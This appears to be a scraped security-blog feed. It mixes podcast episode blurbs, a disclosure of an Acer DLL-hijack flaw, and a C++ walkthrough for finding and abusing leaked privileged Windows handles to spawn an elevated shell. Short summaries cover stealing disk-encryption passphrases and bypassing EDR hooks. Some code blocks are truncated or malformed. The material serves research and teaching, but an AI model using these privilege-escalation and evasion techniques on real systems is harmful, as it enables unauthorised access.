Come per quella di ASUS, questa vulnerabilità è un phantom DLL hijacking. Nel momento in cui un utente si autentica su un computer con Acer Care Center installato, uno scheduled task chiamato “Software Update Application” esegue un binario chiamato ListCheck.exe. Come configurato nello scheduled task, questo binario viene eseguito ad alta integrità nel caso l’utente appartenga al gruppo degli amministratori locali. Il processo così creato cerca di caricare la libreria profapi.dll, andando a cercarla nella cartella C:\ProgramData\OEM\UpgradeTool\.

listcheck missing dll

Le ACL della cartella menzionata non sono configurate correttamente (raramente lo sono nel caso di sottocartelle di C:\ProgramData\).

lax permissions

Ciò significa che, nel caso un utente non privilegiato riesca a posizionare un profapi.dll malevolo all’interno della cartella in questione, un utente con privilegi amministrativi finirebbe con il caricare ed eseguire codice malevolo all’interno di un processo ad alta integrità, portando a esecuzione di codice arbitrario locale e a una privilege escalation.

Patch e workaround

Acer ha rilasciato una patch di sicurezza per Acer Care Center il 27 dicembre 2021. Come workaround preventivo, disabilitare lo scheduled task “Software Update Application” è efficace nel mitigare la vulnerabilità.

Responsible disclosure timeline (YYYY/MM/DD)

  • 2021/10/30: vulnerabilità riportata ad Acer via email a [email protected];
  • 2021/12/08: Acer conferma la ricezione del report e la presenza della vulnerabilità;
  • 2021/12/27: Acer rilascia la patch di sicurezza e conferma che il MITRE ha assegnato alla vulnerabilità l’identificativo CVE-2021-45975;
  • 2022/01/20: l’advisory relativa alla vulnerabilità e questo post vengono resi pubblici;

Questo è quanto per oggi, alla prossima!

last out!

Top cybersecurity breaches of 2021 | Guest Keatron Evans

By: Infosec
17 January 2022 at 08:00

Infosec’s Principal Security Researcher, instructor and cybersecurity renaissance man Keatron Evans returns to the show for the first in a series of once-quarterly episodes breaking down big stories in the news and cybersecurity trends for the future! We talk Solarwinds, Colonial Access Pipeline, Oldsmar, Keatron’s origin story and why, just like practicing your scales makes you a better musician, master pentesters and security pros got where they did by mastering the art of repetition in learning.

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
2:30 - How did you get into cybersecurity? 
4:00 - What skills did you have early on? 
6:10 - First interaction with Infosec
10:34 - Work as a principal security researcher
13:20 - Machine learning in cybersecurity 
14:14 - Infosec classes
17:28 - Equity in cybersecurity 
20:25 - You don't need a technical background
21:36 - Major security breaches of 2021
22:15 - SolarWinds breach
24:56 - What job roles help stop these breaches?
27:50 - Water treatment plant breach
31:42 - Infrastructure security 
34:30 - President Biden and cybersecurity
39:22 - Supply chain security 
43:20 - Security trends for 2022
49:00 - Projects to keep an eye on
50:52 - Learn more about Evans
51:44 - Outro


What does a SOC analyst do? | Cybersecurity Career Series

By: Infosec
20 January 2022 at 08:00

Security operations center (SOC) analysts are responsible for analyzing and monitoring network traffic, threats and vulnerabilities within an organization’s IT infrastructure. This includes monitoring, investigating and reporting security events and incidents from security information and event management (SIEM) systems. SOC analysts also monitor firewall, email, web and DNS logs to identify and mitigate intrusion attempts.

– Start learning cybersecurity for free:
– Learn more about the SOC analyst role:

0:00 Intro 
1:20 - What is a SOC analyst? 
1:58 - Levels of SOC analyst
2:24 - How to become a SOC analyst
2:53 - Certification requirements
3:29 - Skills needed to succeed
4:38 - Tools SOC analysts use
5:32 - Open-source tool familiarity 
6:05 - Pivoting from a SOC analyst
6:50 - What can I do right now?
7:32 - Experience for your resume 
8:07 - Outro  

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


Cybersecurity project management: Your career starts here | Cyber Work Live

By: Infosec
24 January 2022 at 08:00

Are you great with details? Do you like juggling multiple projects at once? Is your organization system the topic of awed discussion between your co-workers? Or are you just interested in getting into cybersecurity from a different angle? If so, you might already be a top-notch project manager and not even know it!

Join a panel of past Cyber Work Podcast guests as they discuss their tips to become a project management all-star:
– Jackie Olshack, Senior Program Manager, Dell Technologies
– Ginny Morton, Advisory Manager, Identity Access Management, Deloitte Risk & Financial Advisory

If you’re interested in project management as a long-term career, Jackie and Ginny will discuss their career histories and tips for breaking into the field. If you plan to use project management as a way to learn more about other cybersecurity career paths, we’ll also cover how to leverage those skills to transition into roles.

This episode was recorded live on December 15, 2021. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here:

– Want to earn your PMP certification? Learn more here:
– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

The topics covered include:
0:00 - Intro
0:51 - Meet the panel
3:12 - Why we're talking project management
6:27 - Agenda for this discussion
6:55 - Part 1: Break into cybersecurity project management
7:45 - Resume recommendations for project managers
12:35 - Interview mistakes for project managers
19:22 - Creating your elevator pitch
23:10 - Importance of your LinkedIn page
25:05 - What certifications should I get?
30:38 - Do I need to be technical to be successful?
34:20 - How to build cybersecurity project management skills
38:28 - Part 2: Doing the work of project management
40:47 - Getting team members to lead themselves
44:50 - Dealing with customer ambiguity
47:30 - Part 3: Pivoting out of project management
47:48 - How do I change roles in an organization
51:50 - What's the next step after cybersecurity project manager?
53:43 - How to move from PMing security teams into leading them?
59:05 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


What does a cloud security engineer do? | Cybersecurity Career Series

By: Infosec
27 January 2022 at 08:00

Cloud security engineers design, develop, manage and maintain a secure infrastructure leveraging cloud platform security technologies. They use technical guidance and engineering best practices to securely build and scale cloud-native applications and configure network security defenses within the cloud environment. These individuals are proficient in identity and access management (IAM), using cloud technology to provide data protection, container security, networking, system administration and zero-trust architecture.

– Start learning cybersecurity for free:
– Learn more about the role of cloud security engineer:

0:00 - Intro 
0:25 - What does a cloud security engineer do? 
1:55 - How to become a cloud security engineer? 
2:55 - How to gain knowledge for the role
4:43 - Skills needed for cloud security engineers
6:00 - Common tools cloud security engineers use
7:43 - Job options available for this work
8:35 - Types of jobs
9:16 - Can you pivot into other roles? 
11:03 - What can I do right now?
12:33 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


Avoiding hardware-based cybersecurity threats | Guest Jessica Amado

By: Infosec
31 January 2022 at 08:00

Jessica Amado, head of cyber research at Sepio Systems, discusses hardware-based cybersecurity threats. We’ve all heard the USB in the parking lot trick, but Amado tells us about the increasingly complex ways cybercriminals bypass hardware safeguards, and lets you know how to make sure that the keyboard or mouse you’re plugging in isn’t carrying a dangerous passenger.

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
2:30 - Initial cybersecurity draw
6:30 - Day-to-day work as head of cybersecurity research
8:44 - How Amado does research
9:37 - Amado's routine 
10:35 - Hardware-based ransomware
13:00 - Other hardware threat factors
17:54 - Security practices with USBs
20:10 - How to check hardware
21:52 - Recommendations on security protocols
23:57 - The future of ransomware and malware
27:20 - How to work in hardware security 
31:35 - Cybersecurity in other industries
32:33 - Advice for cybersecurity students 
34:11 - Sepio Systems 
35:58 - Learn more about Sepio or Amado
36:23 - Outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


Long-term cybersecurity career strategies | Guest Maxime Lamothe-Brassard

By: Infosec
7 February 2022 at 08:00

Maxime Lamothe-Brassard, founder of LimaCharlie, has worked for Crowdstrike, Google X and Chronicle Security before starting his own company. This episode goes deep into thinking about your long-term career strategies, so don’t miss this one if you’re thinking about where you want to go in cybersecurity in two, five or even 10 years from now.

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Intro 
2:56 - First getting into cybersecurity 
6:46 - Working in Canada's national defense
9:33 - Learning on the job
10:39 - Security practices in government versus private sector
13:50 - Average day at LimaCharlie
16:40 - Career journey
19:25 - Skills picked up at each position 
23:57 - How is time length changing? 
27:53 - Security tools and how they could be
31:34 - Where do security tool kits fail? 
34:04 - Current state of practice and study
37:10 - Advice for cybersecurity students in 2022
38:21 - More about LimaCharlie
39:50 - Learn more about LImaCharlie or Maxime
40:08 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


SOCs real-life challenges & solutions

7 February 2022 at 11:10
Introduction As SCRT’s blue teamers, we often deal with Security Operations Centers (SOCs). Being able to interact with many different SOCs for our consultancy service gives us the possibility to understand the main challenges a SOC faces and how to solve them. This blog post results from a Master of Advanced studies’ thesis for Geneva’s … Continue reading SOCs real-life challenges & solutions

🇬🇧 Gaining the upper hand(le)

By: ["last"]
10 February 2022 at 00:00

tortellino windows


There are some situations in which processes with high or SYSTEM integrity request handles to privileged processes/threads/tokens and then spawn lower integrity processes. If these handles are sufficiently powerful, of the right type and are inherited by the child process, we can clone them from another process and then abuse them to escalate privileges and/or bypass UAC. In this post we will learn how to look for and abuse this kind of vulnerability.


Hello there, hackers in arms, last here! Lately I’ve been hunting a certain type of vulnerability which can lead to privilege escalations or UAC bypasses. Since I don’t think it has been thoroughly explained yet, let alone automatized, why don’t we embark on this new adventure?

Essentially, the idea is to see if we can automatically find unprivileged processes which have privileged handles to high integrity (aka elevated) or SYSTEM processes, and then check if we can attach to these processes as an unprivileged user and clone these handles to later abuse them. What constraints will be placed on our tool?

  1. It must run as a medium integrity process
  2. No SeDebugPrivilege in the process’ token (no medium integrity process has that by default)
  3. No UAC bypass as it must also work for non-administrative users

This process is somewhat convoluted, the steps we will go through are more or less the following ones:

  1. Enumerate all handles held by all the processes
  2. Filter out the handles we don’t find interesting - for now we will only focus on handles to processes, threads and tokens, as they are the ones more easily weaponizable
  3. Filter out the handles referencing low integrity processes/threads/tokens
  4. Filter out the handles held by process with integrity greater than medium - we can’t attach to them unless we got SeDebugPrivilege, which defeats the purpose of this article
  5. Clone the remaining handles and import them into our process and try to abuse them to escalate privileges (or at least bypass UAC)

ven diagram

Granted, it’s pretty unlikely we will be finding a ton of these on a pristine Windows machine, so to get around that I will be using a vulnerable application I written specifically for this purpose, though you never know what funny stuff administrators end up installing on their boxes…

Now that we have a rough idea of what we are going to do, let’s cover the basics.

Handles 101

As I briefly discussed in this Twitter thread, Windows is an object based OS, which means that every entity (be it a process, a thread, a mutex, etc.) has an “object” representation in the kernel in the form of a data structure. For processes, for example, this data structure is of type _EPROCESS. Being data living in kernelspace, there’s no way for normal, usermode code to interact directly with these data structures, so the OS exposes an indirection mechanism which relies on special variables of type HANDLE (and derived types like SC_HANDLE for services). A handle is nothing more than a index in a kernelspace table, private for each process. Each entry of the table contains the address of the object it points to and the level of access said handle has to said object. This table is pointed to by the ObjectTable member (which is of type _HANDLE_TABLE*, hence it points to a _HANDLE_TABLE) of the _EPROCESS structure of every process.

To make it easier to digest, let’s see an example. To get a handle to a process we can use the OpenProcess Win32 API - here’s the definition:

HANDLE OpenProcess(
  DWORD dwDesiredAccess,
  BOOL  bInheritHandle,
  DWORD dwProcessId

It takes 3 parameters:

  • dwDesiredAccess is a DWORD which specifies the level of access we want to have on the process we are trying to open
  • bInheritHandle is a boolean which, if set to TRUE, will make the handle inheritable, meaning the calling process copies the returned handle to child processes when they are spawned (in case our program ever calls functions like CreateProcess)
  • dwProcessId is a DWORD which is used to specify which process we want to open (by providing its PID)

In the following line I will try to open a handle to the System process (which always has PID 4), specifying to the kernel that I want the handle to have the least amount of privilege possible, required to query only a subset of information regarding the process (PROCESS_QUERY_LIMITED_INFORMATION) and that I want child processes of this program to inherit the returned handle (TRUE).

HANDLE hProcess;

The handle to the System process returned by OpenProcess (provided it doesn’t fail for some reason) is put into the hProcess variable for later use.

Behind the scenes, the kernel does some security checks and, if these checks pass, takes the provided PID, resolves the address of the associated _EPROCESS structure and copies it into a new entry into the handle table. After that it copies the access mask (i.e. the provided access level) into the same entry and returns the entry value to the calling code.

Similar things happen when you call other functions such as OpenThread and OpenToken.

Viewing handles

As we introduced before, handles are essentially indexes of a table. Each entry contains, among other things, the address of the object the handle refers to and the access level of the handle. We can view this information using tools such as Process Explorer or Process Hacker:

handles 1

From this Process Explorer screenshot we can gain a few information:

  • Red box: the type of object the handle refers to;
  • Blue box: the handle value (the actual index of the table entry);
  • Yellow box: the address of the object the handle refers to;
  • Green box: the access mask and its decoded value (access masks are macros defined in the Windows.h header). This tells us what privileges are granted on the object to the holder of the handle;

To obtain this information there are many methods, not necessarily involving the use of code running in kernelmode. Among these methods, the most practical and useful is relying on the native API NtQuerySystemInformation, which, when called passing the SystemHandleInformation (0x10) value as its first parameter, returns us a pointer to an array of SYSTEM_HANDLE variables where each of them refers to a handle opened by a process on the system.

NTSTATUS NtQuerySystemInformation(
	PVOID                    SystemInformation,
	ULONG                    SystemInformationLength,
	PULONG                   ReturnLength

Let’s have a look at a possible way to do it using C++.

NTSTATUS queryInfoStatus = 0;
PSYSTEM_HANDLE_INFORMATION tempHandleInfo = nullptr;
size_t handleInfoSize = 0x10000;
auto handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
if (handleInfo == NULL) return mSysHandlePid;
while (queryInfoStatus = NtQuerySystemInformation(
	SystemHandleInformation, //0x10
	tempHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
	if (tempHandleInfo == NULL) return mSysHandlePid;
	else handleInfo = tempHandleInfo;

In this block of code we are working with the following variables:

  1. queryInfoStatus which will hold the return value of NtQuerySystemInformation
  2. tempHandleInfo which will hold the data regarding all the handles on the system NtQuerySystemInformation fetches for us
  3. handleInfoSize which is a “guess” of how much said data will be big - don’t worry about that as this variable will be doubled every time NtQuerySystemInformation will return STATUS_INFO_LENGTH_MISMATCH which is a value telling us the allocated space is not enough
  4. handleInfo which is a pointer to the memory location NtQuerySystemInformation will fill with the data we need

Don’t get confused by the while loop here, as we said, we are just calling the function over and over until the allocated memory space is big enough to hold all the data. This type of operation is fairly common when working with the Windows native API.

The data fetched by NtQuerySystemInformation can then be parsed simply by iterating over it, like in the following example:

for (uint32_t i = 0; i < handleInfo->HandleCount; i++) 
	auto handle = handleInfo->Handles[i];
	std::cout << "[*] PID: " << handle.ProcessId << "\n\t"
		  << "|_ Handle value: 0x" << std::hex << static_cast<uint64_t>(handle.Handle) << "\n\t"
                  << "|_ Object address: 0x" << std::hex << reinterpret_cast<uint64_t>(handle.Object) << "\n\t"
                  << "|_ Object type: 0x" << std::hex << static_cast<uint32_t>(handle.ObjectTypeNumber) << "\n\t"
                  << "|_ Access granted: 0x" << std::hex << static_cast<uint32_t>(handle.GrantedAccess) << std::endl;  

As you can see from the code, the variable handle which is a structure of type SYSTEM_HANDLE (auto‘d out of the code) has a number of members that give useful information regarding the handle it refers to. The most interesting members are:

  • ProcessId: the process which holds the handle
  • Handle: the handle value inside the process that holds the handle itself
  • Object: the address in kernelspace of the object the handle points to
  • ObjectTypeNumber: an undocumented BYTE variable which identifies the type of object the handle refers to. To interpret it some reverse engineering and digging is required, suffice it to say that processes are identified by the value 0x07, threads by 0x08 and tokens by 0x05
  • GrantedAccess the level of access to the kernel object the handle grants. In case of processes, you can find values such as PROCESS_ALL_ACCESS, PROCESS_CREATE_PROCESS etc.

Let’s run the aforementioned code and see its output:

listing handles with c++

In this excerpt we are seeing 3 handles that process with PID 4 (which is the System process on any Windows machine) has currently open. All of these handles refer to kernel objects of type process (as we can deduce from the 0x7 value of the object type), each with its own kernelspace address, but only the first one is a privileged handle, as you can deduce from its value, 0x1fffff, which is what PROCESS_ALL_ACCESS translates to. Unluckily, in my research I have found no straightforward way to directly extract the PID of the process pointed to by the ObjectAddress member of the SYSTEM_HANDLE struct. We will see later a clever trick to circumvent this problem, but for now let’s check which process it is using Process Explorer.

seeing the process with procexp

As you can see, the handle with value 0x828 is of type process and refers to the process services.exe. Both the object address and granted access check out as well and if you look to the right of the image you will see that the decoded access mask shows PROCESS_ALL_ACCESS, as expected.

This is very interesting as it essentially allows us to peer into the handle table of any process, regardless of its security context and PP(L) level.

Let’s go hunting

Getting back the PID of the target process from its object address

As I pointed out before, in my research I did not find a way to get back the PID of a process given a SYSTEM_HANDLE to the process, but I did find an interesting workaround. Let’s walk through some assumptions first:

  • The SYSTEM_HANDLE structure contains the Object member, which holds the kernel object address, which is in kernelspace
  • On Windows, all processes have their own address space, but the kernelspace part of the address space (the upper 128TB for 64 bit processes) is the same for all processes. Addresses in kernelspace hold the same data in all processes
  • When it comes to handles referring to processes, the Object member of SYSTEM_HANDLE points to the _EPROCESS structure of the process itself
  • Every process has only one _EPROCESS structure
  • We can obtain a handle to any process, regardless of its security context, by calling OpenProcess and specifying PROCESS_QUERY_LIMITED_INFORMATION as the desired access value
  • When calling NtQuerySystemInformation we can enumerate all of the opened handles

From these assumptions we can deduce the following information:

  • The Object member of two different SYSTEM_HANDLE structures will be the same if the handle is opened on the same object, regardless of the process holding the handle (e.g. two handles opened on the same file by two different processes will have the same Object value)
    • Two handles to the same process opened by two different processes will have a matching Object value
    • Same goes for threads, tokens etc.
  • When calling NtQuerySystemInformation we can enumerate handles held by our own process
  • If we get a handle to a process through OpenProcess we know the PID of said process, and, through NtQuerySystemInformation, its _EPROCESS’s kernelspace address

Can you see where we are going? If we manage to open a handle with access PROCESS_QUERY_LIMITED_INFORMATION to all of the processes and later retrieve all of the system handles through NtQuerySystemInformation we can then filter out all the handles not belonging to our process and extract from those that do belong to our process the Object value and get a match between it and the resulting PID. Of course the same can be done with threads, only using OpenThread and THREAD_QUERY_INFORMATION_LIMITED.

To efficiently open all of the processes and threads on the system we can rely on the routines of the TlHelp32.h library, which essentially allow us to take a snapshot of all the processes and threads on a system and walk through that snapshot to get the PIDs and TIDs (Thread ID) of the processes and threads running when the snapshot was taken.

The following block of code shows how we can get said snapshot and walk through it to get the PIDs of all the processes.

std::map<HANDLE, DWORD> mHandleId;

wil::unique_handle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0));
PROCESSENTRY32W processEntry = { 0 };
processEntry.dwSize = sizeof(PROCESSENTRY32W);

// start enumerating from the first process
auto status = Process32FirstW(snapshot.get(), &processEntry); 

// start iterating through the PID space and try to open existing processes and map their PIDs to the returned shHandle
std::cout << "[*] Iterating through all the PID/TID space to match local handles with PIDs/TIDs...\n";
	auto hTempHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, processEntry.th32ProcessID);
	if (hTempHandle != NULL)
		// if we manage to open a shHandle to the process, insert it into the HANDLE - PID map at its PIDth index
		mHandleId.insert({ hTempHandle, processEntry.th32ProcessID });
} while (Process32NextW(snapshot.get(), &processEntry));

We first define a std::map which is a dictionary-like class in C++ that will allow us to keep track of which handles refer to which PID. We will call it mHandleId.

Done that we take a snapshot of the state of the system regarding processes using the CreateToolhelp32Snapshot and specifying we only want processes (through the TH32CS_SNAPPROCESS argument). This snapshot is assigned to the snapshot variable, which is of type wil::unique_handle, a C++ class of the WIL library which frees us of the burden of having to take care of properly cleaning handles once they are used. Done that we define and initialize a PROCESSENTRY32W variable called processEntry which will hold the information of the process we are examining once we start iterating through the snapshot.

After doing so we call Process32FirstW and fill processEntry with the data of the first process in the snapshot. For each process we try to call OpenProcess with PROCESS_QUERY_LIMITED_INFORMATION on its PID and, if successful, we store the handle - PID pair inside the mHandleId map.

On each while cycle we execute Process32NextW and fill the processEntry variable with a new process, until it returns false and we get out of the loop. We now have a 1 to 1 map between our handles and the PID of the processes they point to. Onto phase 2!

It’s now time to get all of system’s handles and filter out the ones not belonging to our process. We already saw how to retrieve all the handles, now it’s just a matter of checking each SYSTEM_HANDLE and comparing its ProcessId member with the PID of our process, obtainable through the aptly named GetCurrentProcessId function. We then store the Object and Handle members’ value of those SYSTEM_HANDLEs that belong to our process in a similar manner as we did we the handle - PID pairs, using a map we will call mAddressHandle.

std::map<uint64_t, HANDLE> mAddressHandle;
for (uint32_t i = 0; i < handleInfo->HandleCount; i++) 
    auto handle = handleInfo->Handles[i];

    // skip handles not belonging to this process
    if (handle.ProcessId != pid)
        // switch on the type of object the handle refers to
        switch (handle.ObjectTypeNumber)
            mAddressHandle.insert({ (uint64_t)handle.Object, (HANDLE)handle.Handle }); // fill the ADDRESS - HANDLE map 


You might be wondering why the switch statement instead of a simple if. Some code has been edited out as these are excerpt of a tool we Advanced Persistent Tortellini coded specifically to hunt for the vulnerabilities we mentioned at the beginning of the post. We plan on open sourcing it when we feel it’s ready for public shame use.

Now that we have filled our two maps, getting back the PID of a process when we only know it’s _EPROCESS address is a breeze.

auto address = (uint64_t)(handle.Object);
auto foundHandlePair = mAddressHandle.find(address);
auto foundHandle = foundHandlePair->second;
auto handlePidPair = mHandleId.find(foundHandle);
auto handlePid = handlePidPair->second;

We first save the address of the object in the address variable, then look for that address in the mAddressHandle map by using the find method, which will return a <uint64_t,HANDLE> pair. This pair contains the address and the handle it corresponds to. We get the handle by saving the value of the second member of the pair and save it in the foundHandle variable. After that, it’s just a matter of doing what we just did, but with the mHandleId map and the handlePid variable will hold the PID of the process whose address is the one we began with.

Automagically looking for the needle in the haystack

Now that we have a reliable way to match addresses and PIDs, we need to specifically look for those situations where processes with integrity less than high hold interesting handles to processes with integrity equal or greater than high. But what makes a handle “interesting” from a security perspective? Bryan Alexander lays it down pretty clearly in this blogpost, but essentially, when it comes to processes, the handles we will focus on are the ones with the following access mask:


If you find a handle to a privileged process with at least one of this access masks in an unprivileged process, it’s jackpot. Let’s see how we can do it.

std::vector<SYSTEM_HANDLE> vSysHandle;
for (uint32_t i = 0; i < handleInfo->HandleCount; i++) {
    auto sysHandle = handleInfo->Handles[i];
    auto currentPid = sysHandle.ProcessId;
    if (currentPid == pid) continue; // skip our process' handles
    auto integrityLevel = GetTargetIntegrityLevel(currentPid);

    if (
        integrityLevel != 0 &&
        integrityLevel < SECURITY_MANDATORY_HIGH_RID && // the integrity level of the process must be < High
        sysHandle.ObjectTypeNumber == OB_TYPE_INDEX_PROCESS
        if (!(sysHandle.GrantedAccess == PROCESS_ALL_ACCESS || 
        	sysHandle.GrantedAccess & PROCESS_CREATE_PROCESS || 
        	sysHandle.GrantedAccess & PROCESS_CREATE_THREAD || 
        	sysHandle.GrantedAccess & PROCESS_DUP_HANDLE || 
        	sysHandle.GrantedAccess & PROCESS_VM_WRITE)) continue;
        auto address = (uint64_t)(sysHandle.Object);
        auto foundHandlePair = mAddressHandle.find(address);
        if (foundHandlePair == mAddressHandle.end()) continue;
        auto foundHandle = foundHandlePair->second;
        auto handlePidPair = mHandleId.find(foundHandle);
        auto handlePid = handlePidPair->second;
        auto handleIntegrityLevel = GetTargetIntegrityLevel(handlePid);
        if (
            handleIntegrityLevel != 0 &&
            handleIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID // the integrity level of the target must be >= High
            vSysHandle.push_back(sysHandle); // save the interesting SYSTEM_HANDLE

In this block of code we start out by defining a std::vector called vSysHandle which will hold the interesting SYSTEM_HANDLEs. After that we start the usual iteration of the data returned by NtQuerySystemInformation, only this time we skip the handles held by our current process. We then check the integrity level of the process which holds the handle we are currently analyzing through the helper function I wrote called GetTargetIntegrityLevel. This function basically returns a DWORD telling us the integrity level of the token associated with the PID it receives as argument and is adapted from a number of PoCs and MSDN functions available online.

Once we’ve retrieved the integrity level of the process we make sure it’s less than high integrity, because we are interested in medium or low integrity processes holding interesting handles and we also make sure the SYSTEM_HANDLE we are working with is of type process (0x7). Checked that, we move to checking the access the handle grants. If the handle is not PROCESS_ALL_ACCESS or doesn’t hold any of the flags specified, we skip it. Else, we move further, retrieve the PID of the process the handle refers to, and get its integrity level. If it’s high integrity or even higher (e.g. SYSTEM) we save the SYSTEM_HANDLE in question inside our vSysHandle for later (ab)use.

This, kids, is how you automate leaked privileged handle hunting. Now that we have a vector holding all these interesting handles it’s time for the exploit!

Gaining the upper hand(le)!

We have scanned the haystack and separated the needles from the hay, now what? Well, again dronesec’s blogpost details what you can do with each different access, but let’s focus on the more common and easy to exploit: PROCESS_ALL_ACCESS.

First off, we start by opening the process which holds the privileged handle and subsequently clone said handle.

DWORD ownerPid = SysHandle.ProcessId;
HANDLE elevatedToken = NULL;
auto hOwner = OpenProcess(PROCESS_DUP_HANDLE, false, ownerPid);
HANDLE clonedHandle;
auto success = DuplicateHandle(hOwner, (HANDLE)sysHandle.Handle, GetCurrentProcess(), &clonedHandle, NULL, false, DUPLICATE_SAME_ACCESS);

This is fairly easy and if you skip error control, which you shouldn’t skip (right, h0nus?), it boils down to only a handful of code lines. First you open the process with PROCESS_DUP_HANDLE access, which is the least amount of privilege required to duplicate a handle, and then call DuplicateHandle on that process, telling the function you want to clone the handle saved in sysHandle.Handle (which is the interesting handle we retrieved before) and save it into the current process in the clonedHandle variable.

In this way our process is now in control of the privileged handle and we can use it to spawn a new process, spoofing its parent as the privileged process the handle points to, thus making the new process inherit its security context and getting, for example, a command shell.

STARTUPINFOEXW sinfo = { sizeof(sinfo) };
SIZE_T bytes = 0;
sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);
UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &clonedHandle, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;
std::wstring commandline = L"C:\\Windows\\System32\\cmd.exe";

auto success = CreateProcessW(

Let’s see it in action 😊

poc gif

Some notes:

  • I later noticed Dronesec used NtQueryObject to find the process name associated with the kernel object. I don’t find it feasible for a large number of handles as calling this would slow down a lot the process of matching addresses with handles
  • Of course, if the medium integrity process we want to attach to in order to clone the privileged handle runs in the context of another user, we can’t exploit it as we’d need SeDebugPrivilege
  • I voluntarily left out the thread and token implementation of the exploit to the reader as an exercise 😉

We are planning on releasing this tool, UpperHandler, as soon as we see fit. Stay tuned!

last out!


Bypass Disk Encryption Linux

By: Author
5 December 2021 at 14:45
We are going to learn how to steal the passphrase of a drive encrypted with default setup on a Debian distribution. How? Through physical intrusion! The general idea is simple. By default, disk encryption on Debian (and many other distributions) doesn’t encrypt the \boot directory. Even if full disk encyprtion is available via Grub2… To perform this attack, we are going to use a Live USB on the target machine. Using the live USB, we are going to modify the script asking the passphrase (located in /boot) to make it write, in a text file, the passphrase typed by the victim.

Playing With Named Pipe and NotPetya

By: Author
5 December 2021 at 18:50
A long time ago, in a galaxy far far away, I was having fun reversing NotPetya. Files dropped by NotPetya During the dynamical analysis, I identified some files dropped on the disk by the sample. Files dropped in the disk An executed file using named pipe One of them caught my eye: it is executed by the sample with a named pipe argument. A binary executed with named pipe argument

Unhook the Import Address Table

By: Author
6 December 2021 at 17:07
Damn my Import Address Table is hooked! One day at work, I was trying to bypass an EDR and I noticed something interesting. The EDR I was trying to bypass wasn’t hooking the DLL in their code with jmp instruction like other EDRs in user-land. In this case, it was hooking directly the Import Address Table. This technique makes the usual move like live-patching, or erasing the loaded DLL with one freshly loaded from disk useless.

EDR Bypass : Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2

By: Author
29 January 2022 at 19:13
This post is not an extensive presentation of Hell’s Gate1, Halo’s Gate, FreshyCalls2 or Syswhispers23. You can find detailed explaination on these techniques on their Github repo, various articles and the amazing Sektor7 Windows Evasion Course4. So whats the point of this article then ? Well, I find the various techniques used to dynamically retrieve syscall identifiers very interesting and I wanted to present the difference between them. Soooo let’s begin shall we ?

Data backup in ransomware situations | Guest Curtis Preston, aka “Mr. Backup”

By: Infosec
14 February 2022 at 08:00

Curtis Preston, aka “Mr. Backup,” has been in the backup and recovery space since 1993. He’s written four books, hosts a podcast called “Restore it all,” founded and is a tech evangelist for SaaS data protection company Druva. We talk about disaster recovery, the role of good backup in ransomware situations and why the data recovery person and the information security person in your company need to become fast friends and start sharing notes. Also, why we’ve all been completely wrong about tape backup systems.

– Start learning cybersecurity for free:
– View Cyber Work Podcast transcripts and additional episodes:

0:00 - Cyber Work intro 
2:40 - Mr. Backup origin story
4:01 - How backup and recovery has changed
7:44 - Data duplication during a disaster
9:45 - Speed of data recovery changes
12:47 - Benefit to physical data backups
15:37 - Common long-term data backup mistakes
19:04 - Other issues with data recovery
23:22 - Limits of disaster recovery
34:16 - Encryption options 
39:44 - Jobs in data backup and recovery
44:54 - Benefit to learning data backup and recovery
46:53 - Data backup and recovery outlook
52:52 - What is the Restore It All podcast?
56:15 - What is Druva? 
59:45 - Where can I learn more about Mr. Backup? 
1:00:32 - Cyber Work outro 

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at


What does a security architect do? | Cybersecurity Career Series

By: Infosec
21 February 2022 at 08:00

Security Architects are responsible for planning, designing, testing, implementing and maintaining an organization's computer and network security infrastructure. Security Architects develop information technology rules and requirements that describe baseline and target architectures and support enterprise mission needs.

Advanced technical knowledge of network/web protocols, infrastructure, authentication, enterprise risk management, security engineering, communications and network security, identity and access management, and incident response, is critical to success in this role.

– Start learning cybersecurity for free:
– Learn more about the role of security architect:

